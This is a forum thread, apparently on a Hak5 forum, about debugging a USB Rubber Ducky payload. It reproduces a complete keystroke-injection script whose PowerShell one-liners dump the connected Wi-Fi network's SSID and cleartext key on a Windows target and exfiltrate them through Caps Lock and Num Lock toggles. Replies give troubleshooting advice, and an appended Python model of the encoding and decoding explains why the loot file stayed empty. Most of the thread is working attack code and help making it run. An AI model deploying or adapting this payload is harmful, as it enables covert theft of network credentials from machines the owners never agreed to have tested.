geekintheshell Posted March 24, 2023

I start with a blank payload screen (Payload Studio Community), paste the code as plain text from the example at https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#example-3. I can see the PowerShell commands executing, but a loot file is never created. What am I missing?
dark_pyrro Posted March 24, 2023

Are you linking to the correct example? I can't see any PowerShell commands there (example 2 has such, though).
geekintheshell Posted March 24, 2023

Here's the whole script from the example (PS cmds in bold):

```
REM Example Simple (unobfuscated) Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN profile (SSID & Key) to DUCKY
ATTACKMODE HID
LED_OFF
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE

REM Store the currently connected wireless LAN SSID & Key to %tmp%\z
GUI r
DELAY 100
STRING powershell "netsh wlan show profile name=(Get-NetConnectionProfile)
STRING .Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
ENTER
DELAY 100

REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
ENTER
DELAY 100

REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
GUI r
DELAY 100
STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
ENTER
DELAY 100

REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
```
dark_pyrro Posted March 24, 2023

Yeah, that's example 2. With that sorted, what output do you get if you run the first PowerShell command manually from the Windows Run dialog (GUI r) on the target machine? Does the target machine have any wireless networks configured?
geekintheshell Posted March 24, 2023

Thank you. I wasn't seeing that the 1st PS cmd was not executing completely, since it goes away so fast on screen.
dark_pyrro Posted March 24, 2023

Running target-side stuff manually is often a good approach when troubleshooting while developing payloads, especially in PowerShell, where windows might just pop up and disappear. Using the -NoExit flag might be helpful in such cases if starting from the Windows Run dialog.
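An added example (my own Python, not code from this thread or from Hak5) that models what the payload posted above does on each side of the Keystroke Reflection channel: the first one-liner's filter over netsh output, the second one-liner's bit-to-lock-key encoding (MSB first, set bit to NUMLOCK, clear bit to CAPSLOCK, SCROLLLOCK appended as the end marker), and the decoding the Ducky has to perform while $_EXFIL_MODE_ENABLED is TRUE. The netsh output is constructed sample text, the function names are mine, and the UTF-8 encoding of the profile text is an assumption. It also shows the situation diagnosed in this thread: when the first one-liner never writes %tmp%\z, the second one-liner's loop runs zero times and $o becomes just the SCROLLLOCK token, so the third one-liner sends the end marker with no data bits in front of it.

```python
"""Model of the Keystroke Reflection exfil used by the posted payload.

Added example, not code from this thread or from Hak5. The bit -> lock-key
mapping follows the payload's second PowerShell one-liner (MSB first, set bit
-> NUMLOCK, clear bit -> CAPSLOCK, SCROLLLOCK appended as end marker). The
decoder is my model of what the Ducky does while $_EXFIL_MODE_ENABLED is TRUE;
the function names are mine, and SAMPLE_NETSH_OUTPUT is constructed text.
"""
import re

NUMLOCK, CAPSLOCK, SCROLLLOCK = "%{NUMLOCK}", "%{CAPSLOCK}", "%{SCROLLLOCK}"

# Constructed stand-in for `netsh wlan show profile name=<ssid> key=clear`.
SAMPLE_NETSH_OUTPUT = """\
Profile HomeNet on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : HomeNet
    Control options        :
        Connection mode    : Connect automatically

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "HomeNet"
    Network type           : Infrastructure

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : hunter2-example
"""


def extract_profile(netsh_output: str) -> str:
    """Mirror the first one-liner's filter: keep lines that -match 'SSID n|Key C'
    (case-insensitive, like PowerShell -match), split each on ':' and keep
    field [1]. The leading space survives and a key containing ':' would be
    truncated, exactly as in the payload. The real file is written by `>`,
    so it has CRLF line endings (and is UTF-16LE with a BOM under Windows
    PowerShell 5.1); this model uses plain '\\n'."""
    kept = [
        line.split(":")[1]
        for line in netsh_output.splitlines()
        if re.search(r"SSID n|Key C", line, re.IGNORECASE)
    ]
    return "\n".join(kept) + "\n"


def encode(data: bytes) -> str:
    """Bytes -> SendKeys token string, one lock-key token per bit, MSB first."""
    tokens = []
    for b in data:
        for mask in (0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01):
            tokens.append(NUMLOCK if b & mask else CAPSLOCK)
    tokens.append(SCROLLLOCK)  # what WAIT_FOR_SCROLL_CHANGE is waiting for
    return "".join(tokens)


def decode(sendkeys: str):
    """Ducky-side view of the stream: every NUMLOCK/CAPSLOCK press is one
    LED-state change, eight changes make a byte, SCROLLLOCK ends the stream.
    Returns (data, complete); complete is False if no SCROLLLOCK arrived
    before the input ran out, or if a byte was left half-received."""
    data = bytearray()
    bits = []
    complete = False
    for tok in re.findall(r"%\{(NUMLOCK|CAPSLOCK|SCROLLLOCK)\}", sendkeys):
        if tok == "SCROLLLOCK":
            complete = True
            break
        bits.append(1 if tok == "NUMLOCK" else 0)
        if len(bits) == 8:
            data.append(int("".join(map(str, bits)), 2))
            bits = []
    return bytes(data), complete and not bits


def round_trip(netsh_output: str = SAMPLE_NETSH_OUTPUT):
    """Target side (extract + encode) followed by Ducky side (decode)."""
    profile = extract_profile(netsh_output)
    # Assumption: UTF-8 here; the real stream carries whatever bytes `>` wrote.
    return decode(encode(profile.encode("utf-8")))


def missing_first_stage():
    """What the Ducky sees when the first one-liner never created %tmp%\\z:
    the second one-liner's loop runs zero times, $o becomes just the
    SCROLLLOCK token, and the third one-liner sends only that."""
    return decode(SCROLLLOCK)


if __name__ == "__main__":
    print(extract_profile(SAMPLE_NETSH_OUTPUT))
    print(encode(b"A"))
    print(round_trip())
    print(missing_first_stage())
```

Two things worth checking against the real target rather than this model: `cat -En by` is `Get-Content -Encoding Byte`, which exists in Windows PowerShell 5.1 (what `powershell` launches) but was replaced by `-AsByteStream` in PowerShell 6 and later, and the `>` redirection in Windows PowerShell 5.1 writes UTF-16LE with a BOM, so the loot bytes will not be plain ASCII even when the profile text is.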